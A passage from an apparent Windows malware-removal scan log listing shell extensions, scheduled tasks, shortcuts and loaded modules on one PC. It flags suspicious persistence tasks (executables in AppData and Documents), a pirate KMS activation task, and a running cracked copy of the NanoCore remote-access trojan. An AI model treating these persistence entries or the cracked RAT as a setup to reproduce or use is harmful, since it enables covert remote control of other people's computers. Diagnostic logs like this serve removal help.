ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2014-12-02] (Alexander Roshal)
ContextMenuHandlers2-x32: [ChangeIcon] -> {C912EFA0-0076-11d5-B04A-BD6C80DF2479} => C:\Program Files (x86)\IconChanger\IconChng.dll -> No File
ContextMenuHandlers2-x32-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2017-03-21] (VMware, Inc.)
ContextMenuHandlers2-x32-x32: [VMDiskMenuHandler64] -> {E4D28EDC-8C0B-43EE-9E7D-C8A8682334DC} => C:\Program Files (x86)\VMware\VMware Player\x64\vmdkShellExt64.dll [2017-03-21] (VMware, Inc.)
ContextMenuHandlers3-x32: [ChangeIcon] -> {C912EFA0-0076-11d5-B04A-BD6C80DF2479} => C:\Program Files (x86)\IconChanger\IconChng.dll -> No File
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2016-12-29] (NVIDIA Corporation)
ContextMenuHandlers6-x32: [ChangeIcon] -> {C912EFA0-0076-11d5-B04A-BD6C80DF2479} => C:\Program Files (x86)\IconChanger\IconChng.dll -> No File
ContextMenuHandlers6-x32: [FineReader14ContextMenu] -> {FB074836-8286-4089-84DC-F504E9EF621C} => C:\Program Files (x86)\ABBYY FineReader 14\x64\FRIntegration.x64.dll [2017-02-28] (ABBYY Production LLC.)
ContextMenuHandlers6-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2014-12-02] (Alexander Roshal)
ContextMenuHandlers6-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2014-12-02] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0E873CFE-A930-4A66-9A73-275B2DE24047} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-10-04] (Google Inc.)
Task: {15763971-DA23-493F-944D-7115401064BE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-10-04] (Google Inc.)
Task: {18D919FD-3777-481D-B231-8E9D79876919} - System32\Tasks\SmartScreen => C:\Users\Alex-PC\AppData\Roaming\SmartScreen.exe <==== ATTENTION
Task: {25131BEA-DA1B-4F77-93BF-06D7A25929C5} - System32\Tasks\123456789 => C:\Users\Alex-PC\Documents\obs32.exe <==== ATTENTION
Task: {2F171498-8C35-4021-B544-4F55CBB70A64} - System32\Tasks\Microsoft Office 15 Sync Maintenance for DESKTOP-B9SFE6M-Alex-PC DESKTOP-B9SFE6M => C:\Program Files (x86)\Microsoft Office\Office15\MsoSync.exe [2014-01-23] (Microsoft Corporation)
Task: {2F4C6AA6-4C90-4F24-AC39-3E00B73D91D9} - System32\Tasks\R@1n-KMS\Windows64Professional => wmic [Argument = path SoftwareLicensingProduct where (ID="2de67392-b7a7-462a-b1ca-108dd189f588") call Activate]
Task: {3E2211B0-A5EB-4356-B872-F51FB5FDE769} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: <Company name>)
Task: {4301FAED-2B0B-4077-8B0E-02E895350A99} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-04-26] (NVIDIA Corporation)
Task: {53F225CF-CE6C-4FB4-87A3-BEEE83106168} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-03-03] (Piriform Ltd)
Task: {56E36A6E-DBA6-4408-88A3-AB9064F67088} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-04-26] (NVIDIA Corporation)
Task: {5F0CF46D-652A-462C-900B-846672445D97} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-04-26] (NVIDIA Corporation)
Task: {63F58676-0FAF-4636-9184-11A16CFE93CA} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-04-26] (NVIDIA Corporation)
Task: {669CA313-AB86-498B-91EE-059BFD6AAF99} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-04-26] (NVIDIA Corporation)
Task: {8C4B8399-9819-4B2D-9EAF-64496BA87391} - System32\Tasks\DDP Service => C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe [2016-07-13] (Microsoft Corporation)
Task: {96A8715B-8323-4A85-9A6E-C9CD74C11A53} - System32\Tasks\update-S-1-5-21-301418830-272668332-706810675-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2017-04-12] (TODO: <Company name>)
Task: {9915C9A1-F98C-46D0-8253-D5AC9E1AB7D7} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-04-26] (NVIDIA Corporation)
Task: {9B1C9BF3-FE4E-4DE0-B786-CC8BF70CAD2C} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation)
Task: {9DFFD059-D824-44D1-A5D5-1CA61A7B71EC} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe
Task: {9F6D3B43-0E4A-4112-BECE-914D8DB509E9} - System32\Tasks\12345678 => C:\Users\Alex-PC\Documents\SecuritySystem.exe <==== ATTENTION
Task: {AFEEED84-A739-4275-B4C1-BF95B851797E} - System32\Tasks\FACEIT Client => C:\Program Files\FACEIT Client\faceitclient.exe [2017-05-29] ()
Task: {B3AFD235-3998-4712-BFA2-871BB03FDFE8} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {B5FCB4E7-78F2-4ADA-BA0F-5F307F65DB2C} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-04-26] (NVIDIA Corporation)
Task: {C56BEC12-709D-4BDD-AA44-178ED9CD6952} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation)
Task: {DBE78A9A-A73F-4287-A923-9EB54133F24F} - System32\Tasks\ProgramDataUpdater => C:\windows\pdusvr.exe [2017-02-19] ()
Task: {DDC279EF-BABE-4D4D-BBB2-A7F1101C9D58} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {E13FC128-F203-4C4C-A165-2CE9D9935FDD} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Alex-PC\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {FEDBAF98-31B0-4FB0-B9CB-631825D97B7D} - System32\Tasks\DDP Service Task => C:\Program Files (x86)\DDP Service\ddpsv.exe [2016-07-13] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\update-S-1-5-21-301418830-272668332-706810675-1001.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
Task: C:\WINDOWS\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Alex-PC\Desktop\Command & Conquer 3 - Tiberium Wars (Лаунчер для выбора версии игры).lnk -> D:\Games\Command & Conquer 3 - Tiberium Wars\CNC3v.exe () <==== Cyrillic

ShortcutWithArgument: C:\Users\Alex-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\VK inviz.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=ffniakoflaobbkjjcnlnmepodehaflkd
ShortcutWithArgument: C:\Users\Alex-PC\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Person 1 - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"

==================== Loaded Modules (Whitelisted) ==============

2016-07-16 14:42 - 2016-07-16 14:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2017-07-12 15:41 - 2017-06-21 10:48 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2017-02-12 17:07 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
2016-10-10 18:38 - 2017-04-26 08:40 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-10-15 23:09 - 2016-12-29 15:44 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2014-01-22 06:07 - 2014-01-22 06:07 - 08878248 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2017-06-19 00:44 - 2017-06-19 00:44 - 00230064 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2016-10-16 21:33 - 2016-09-07 07:56 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-03-16 00:37 - 2017-03-04 09:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-16 00:37 - 2017-03-04 09:30 - 00693248 _____ () C:\Windows\ShellExperiences\MtcUvc.dll
2016-08-23 17:44 - 2016-08-23 17:44 - 00431456 _____ () C:\Program Files (x86)\SaferVPN\bin\openvpn-gui.exe
2017-04-18 20:20 - 2017-04-18 20:20 - 02270032 _____ () C:\Program Files (x86)\SaferVPN\SaferVPN.Service.exe
2017-04-15 23:46 - 2017-04-15 23:46 - 01442816 _____ () D:\New folder (2)\NanoCore1.2.2.0_Improved_BugFixed_CrackedByAlcatraz32222\NanoCore 1.2.2.0_Cracked By Alcatraz3222\NanoCore.exe
2017-04-18 20:20 - 2017-04-18 20:20 - 07976272 _____ () C:\Program Files (x86)\SaferVPN\SaferVPN.exe
2017-04-05 19:57 - 2017-04-05 19:58 - 01738952 _____ () D:\New folder (2)\AnyDesk.exe
2016-12-15 02:28 - 2016-12-08 11:03 - 02412888 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libglesv2.dll
2016-12-15 02:28 - 2016-12-08 11:03 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\55.0.2883.87\libegl.dll
2016-07-14 13:25 - 2016-07-14 13:25 - 00174872 _____ () C:\Program Files\TeamSpeak 3 Client\quazip.dll
2016-07-14 13:25 - 2016-07-14 13:25 - 00103192 _____ () C:\Program Files\TeamSpeak 3 Client\soundbackends\directsound_win64.dll
2016-07-14 13:25 - 2016-07-14 13:25 - 00107800 _____ () C:\Program Files\TeamSpeak 3 Client\soundbackends\windowsaudiosession_win64.dll
2016-07-14 13:26 - 2016-07-14 13:26 - 00312088 _____ () C:\Program Files\TeamSpeak 3 Client\plugins\clientquery_plugin.dll
2016-07-14 13:26 - 2016-07-14 13:26 - 00485656 _____ () C:\Program Files\TeamSpeak 3 Client\plugins\teamspeak_control_plugin.dll
2016-10-26 18:27 - 2015-07-14 15:58 - 12548624 _____ () C:\Program Files (x86)\Zoiper\Zoiper.exe
2017-03-16 00:38 - 2017-03-04 09:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-16 00:38 - 2017-03-04 09:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-16 00:38 - 2017-03-04 09:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-07-12 15:41 - 2017-06-21 09:35 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-07-12 15:41 - 2017-06-21 09:37 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-07-21 19:42 - 2017-07-21 19:43 - 24054272 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.17062.12911.0_x64__8wekyb3d8bbwe\Video.UI.exe
2017-07-21 19:42 - 2017-07-21 19:43 - 09161728 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.17062.12911.0_x64__8wekyb3d8bbwe\EntCommon.dll
2017-07-14 10:27 - 2017-07-14 10:34 - 03500456 _____ () C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.17062.12911.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2017-07-12 11:46 - 2017-07-12 11:49 - 00020480 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2017.18062.13720.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2017-07-12 11:46 - 2017-07-12 11:49 - 27590144 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2017.18062.13720.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2017-07-12 11:46 - 2017-07-12 11:49 - 00428032 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2017.18062.13720.0_x64__8wekyb3d8bbwe\Microsoft.Photos.AGM.Native.Windows.dll
2017-07-12 11:46 - 2017-07-12 11:49 - 20649984 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2017.18062.13720.0_x64__8wekyb3d8bbwe\PhotosApp.Windows.dll
2017-07-12 11:46 - 2017-07-12 11:49 - 02305536 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2017.18062.13720.0_x64__8wekyb3d8bbwe\MediaEngine.dll
2017-07-12 11:46 - 2017-07-12 11:49 - 02856448 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2017.18062.13720.0_x64__8wekyb3d8bbwe\AppCore.Windows.dll
2017-06-03 13:25 - 2017-06-03 13:32 - 03139496 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2017.18062.13720.0_x64__8wekyb3d8bbwe\Microsoft.UI.Xaml.dll
2017-06-03 13:25 - 2017-06-03 13:32 - 00046080 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2017.18062.13720.0_x64__8wekyb3d8bbwe\Microsoft.Photos.Edit.Services.dll
2016-10-03 11:39 - 2016-10-03 11:40 - 00680448 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2017.18062.13720.0_x64__8wekyb3d8bbwe\Microsoft.DesignCore.dll
2017-07-12 11:46 - 2017-07-12 11:49 - 01127936 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2017.18062.13720.0_x64__8wekyb3d8bbwe\Microsoft.RichMedia.Ink.Controls.dll
2017-05-05 14:14 - 2017-05-05 14:16 - 01062400 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2017.18062.13720.0_x64__8wekyb3d8bbwe\Microsoft.Sharing.dll
2016-11-15 17:02 - 2016-11-09 16:07 - 02493440 _____ () C:\Program Files (x86)\Origin\libGLESv2.dll
2016-10-10 18:38 - 2017-04-26 08:40 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2017-06-20 11:28 - 2017-06-20 11:28 - 01997792 ____R () C:\Program Files (x86)\Skype\Phone\skypert.dll
2016-10-10 18:38 - 2017-04-26 08:03 - 02442360 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-10-10 18:38 - 2017-04-26 08:03 - 00361920 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-10-10 18:38 - 2017-04-26 08:03 - 00252352 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-10-10 18:38 - 2017-04-26 08:03 - 00384120 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-10-10 18:38 - 2017-04-26 08:03 - 00467392 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-10-10 18:38 - 2017-04-26 08:03 - 00572024 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-06-20 00:24 - 2016-06-20 00:24 - 00036878 _____ () C:\Program Files (x86)\Pidgin\libssp-0.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00671031 _____ () C:\Program Files (x86)\Pidgin\exchndl.dll
2016-12-07 22:14 - 2016-12-07 22:14 - 00904525 _____ () C:\Program Files (x86)\Pidgin\Gtk\bin\libcairo-2.dll
2016-12-07 22:14 - 2016-12-07 22:14 - 00118272 _____ () C:\Program Files (x86)\Pidgin\Gtk\bin\zlib1.dll
2016-12-07 22:14 - 2016-12-07 22:14 - 00216992 _____ () C:\Program Files (x86)\Pidgin\Gtk\bin\libpng14-14.dll
2016-12-07 22:14 - 2016-12-07 22:14 - 00279059 _____ () C:\Program Files (x86)\Pidgin\Gtk\bin\libfontconfig-1.dll
2016-12-07 22:14 - 2016-12-07 22:14 - 00553382 _____ () C:\Program Files (x86)\Pidgin\Gtk\bin\freetype6.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 01136034 _____ () C:\Program Files (x86)\Pidgin\libxml2-2.dll
2016-12-07 22:14 - 2016-12-07 22:14 - 00177586 _____ () C:\Program Files (x86)\Pidgin\Gtk\bin\libexpat-1.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00475580 _____ () C:\Program Files (x86)\Pidgin\spellcheck\libgtkspell-0.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00020997 _____ () C:\Program Files (x86)\Pidgin\plugins\autoaccept.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00013253 _____ () C:\Program Files (x86)\Pidgin\plugins\buddynote.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00024924 _____ () C:\Program Files (x86)\Pidgin\plugins\convcolors.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00015702 _____ () C:\Program Files (x86)\Pidgin\plugins\extplacement.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00014147 _____ () C:\Program Files (x86)\Pidgin\plugins\gtkbuddynote.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00018882 _____ () C:\Program Files (x86)\Pidgin\plugins\history.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00012865 _____ () C:\Program Files (x86)\Pidgin\plugins\iconaway.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00019043 _____ () C:\Program Files (x86)\Pidgin\plugins\idle.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00018555 _____ () C:\Program Files (x86)\Pidgin\plugins\joinpart.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00015074 _____ () C:\Program Files (x86)\Pidgin\plugins\libaim.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00315843 _____ () C:\Program Files (x86)\Pidgin\liboscar.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00093066 _____ () C:\Program Files (x86)\Pidgin\plugins\libbonjour.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00332178 _____ () C:\Program Files (x86)\Pidgin\plugins\libgg.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00016005 _____ () C:\Program Files (x86)\Pidgin\plugins\libicq.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00108441 _____ () C:\Program Files (x86)\Pidgin\plugins\libirc.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00128694 _____ () C:\Program Files (x86)\Pidgin\libsasl2-3.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00374169 _____ () C:\Program Files (x86)\Pidgin\plugins\libmsn.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00151731 _____ () C:\Program Files (x86)\Pidgin\plugins\libmxit.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00106671 _____ () C:\Program Files (x86)\Pidgin\plugins\libmyspace.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00123540 _____ () C:\Program Files (x86)\Pidgin\plugins\libnovell.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00116071 _____ () C:\Program Files (x86)\Pidgin\plugins\libsametime.dll
2016-06-20 00:23 - 2016-06-20 00:23 - 00152852 _____ () C:\Program Files (x86)\Pidgin\libmeanwhile-1.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00171123 _____ () C:\Program Files (x86)\Pidgin\plugins\libsilc.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00225616 _____ () C:\Program Files (x86)\Pidgin\libsilcclient-1-1-4.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00868705 _____ () C:\Program Files (x86)\Pidgin\libsilc-1-1-4.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00055880 _____ () C:\Program Files (x86)\Pidgin\plugins\libsimple.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00021337 _____ () C:\Program Files (x86)\Pidgin\plugins\libxmpp.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00417764 _____ () C:\Program Files (x86)\Pidgin\libjabber.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00022832 _____ () C:\Program Files (x86)\Pidgin\plugins\libyahoo.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00236666 _____ () C:\Program Files (x86)\Pidgin\libymsg.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00019793 _____ () C:\Program Files (x86)\Pidgin\plugins\libyahoojp.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00047934 _____ () C:\Program Files (x86)\Pidgin\plugins\log_reader.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00021795 _____ () C:\Program Files (x86)\Pidgin\plugins\markerline.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00013456 _____ () C:\Program Files (x86)\Pidgin\plugins\newline.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00030249 _____ () C:\Program Files (x86)\Pidgin\plugins\notify.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00021075 _____ () C:\Program Files (x86)\Pidgin\plugins\nss-prefs.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00017023 _____ () C:\Program Files (x86)\Pidgin\plugins\offlinemsg.dll
2016-03-08 01:49 - 2016-03-08 01:49 - 00848384 _____ () C:\Program Files (x86)\Pidgin\plugins\pidgin-otr.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00029256 _____ () C:\Program Files (x86)\Pidgin\plugins\pidginrc.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00015380 _____ () C:\Program Files (x86)\Pidgin\plugins\psychic.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00015429 _____ () C:\Program Files (x86)\Pidgin\plugins\relnot.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00015045 _____ () C:\Program Files (x86)\Pidgin\plugins\sendbutton.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00069625 _____ () C:\Program Files (x86)\Pidgin\plugins\spellchk.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00031993 _____ () C:\Program Files (x86)\Pidgin\plugins\ssl-nss.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00012004 _____ () C:\Program Files (x86)\Pidgin\plugins\ssl.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00015978 _____ () C:\Program Files (x86)\Pidgin\plugins\statenotify.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00030353 _____ () C:\Program Files (x86)\Pidgin\plugins\themeedit.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00032020 _____ () C:\Program Files (x86)\Pidgin\plugins\ticker.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00018399 _____ () C:\Program Files (x86)\Pidgin\plugins\timestamp.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00023851 _____ () C:\Program Files (x86)\Pidgin\plugins\timestamp_format.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00029791 _____ () C:\Program Files (x86)\Pidgin\plugins\win2ktrans.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00030771 _____ () C:\Program Files (x86)\Pidgin\plugins\winprefs.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00037191 _____ () C:\Program Files (x86)\Pidgin\plugins\xmppconsole.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00044494 _____ () C:\Program Files (x86)\Pidgin\plugins\xmppdisco.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00048402 _____ () C:\Program Files (x86)\Pidgin\sasl2\libanonymous-3.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00049962 _____ () C:\Program Files (x86)\Pidgin\sasl2\libcrammd5-3.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00079858 _____ () C:\Program Files (x86)\Pidgin\sasl2\libdigestmd5-3.dll
2016-06-20 00:24 - 2016-06-20 00:24 - 00048907 _____ () C:\Program Files (x86)\Pidgin\sasl2\libplain-3.dll
2016-06-20 00:23 - 2016-06-20 00:23 - 00554496 _____ () C:\Program Files (x86)\Pidgin\sqlite3.dll
2016-12-07 22:14 - 2016-12-07 22:14 - 00090496 _____ () C:\Program Files (x86)\Pidgin\Gtk\lib\gtk-2.0\2.10.0\engines\libwimp.dll
2017-04-15 23:46 - 2015-02-23 16:52 - 00029184 _____ () D:\New folder (2)\NanoCore1.2.2.0_Improved_BugFixed_CrackedByAlcatraz32222\NanoCore 1.2.2.0_Cracked By Alcatraz3222\ServerPlugin.dll
2017-04-15 23:46 - 2015-02-23 16:52 - 00019968 _____ () D:\New folder (2)\NanoCore1.2.2.0_Improved_BugFixed_CrackedByAlcatraz32222\NanoCore 1.2.2.0_Cracked By Alcatraz3222\ClientPlugin.dll
2014-01-23 17:55 - 2014-01-23 17:55 - 08878248 _____ () C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2017-06-02 02:01 - 2017-05-17 04:54 - 00678176 _____ () D:\Steam\SDL2.dll
2017-03-18 22:25 - 2016-09-01 04:02 - 04969248 _____ () D:\Steam\v8.dll
2017-07-18 23:22 - 2017-07-18 03:33 - 02497824 _____ () D:\Steam\video.dll
2017-03-18 22:25 - 2016-09-01 04:02 - 01563936 _____ () D:\Steam\icui18n.dll
2017-03-18 22:25 - 2016-09-01 04:02 - 01195296 _____ () D:\Steam\icuuc.dll
2017-03-18 22:25 - 2016-01-27 10:49 - 02549760 _____ () D:\Steam\libavcodec-56.dll
2017-03-18 22:25 - 2016-01-27 10:49 - 00491008 _____ () D:\Steam\libavformat-56.dll
2017-03-18 22:25 - 2016-01-27 10:49 - 00332800 _____ () D:\Steam\libavresample-2.dll
2017-03-18 22:25 - 2016-01-27 10:49 - 00442880 _____ () D:\Steam\libavutil-54.dll
2017-03-18 22:25 - 2016-01-27 10:49 - 00485888 _____ () D:\Steam\libswscale-3.dll
2017-07-18 23:22 - 2017-07-18 03:33 - 00884512 _____ () D:\Steam\bin\chromehtml.DLL
2017-03-18 22:25 - 2016-07-05 01:17 - 00266560 _____ () D:\Steam\openvr_api.dll
2017-07-12 21:51 - 2017-07-06 20:58 - 73088800 _____ () D:\Steam\bin\cef\cef.win7\libcef.dll
2017-06-08 13:15 - 2017-05-17 04:54 - 00678176 _____ () D:\Steam\bin\cef\cef.win7\SDL2.dll
2017-07-18 23:22 - 2017-07-18 03:33 - 00384288 _____ () D:\Steam\steam.dll
2016-08-26 14:41 - 2017-07-13 00:45 - 68505088 _____ () C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\libcef.dll
2016-07-16 14:42 - 2016-07-16 14:42 - 01872384 _____ () C:\Windows\System32\speech_onecore\engines\tts\MSTTSEngine_OneCore.dll
2016-07-16 14:42 - 2016-07-16 14:42 - 00638976 _____ () C:\Windows\System32\speech_onecore\engines\tts\MSTTSLoc_OneCore.DLL
2017-03-18 22:25 - 2015-09-25 02:52 - 00119208 _____ () D:\Steam\winh264.dll
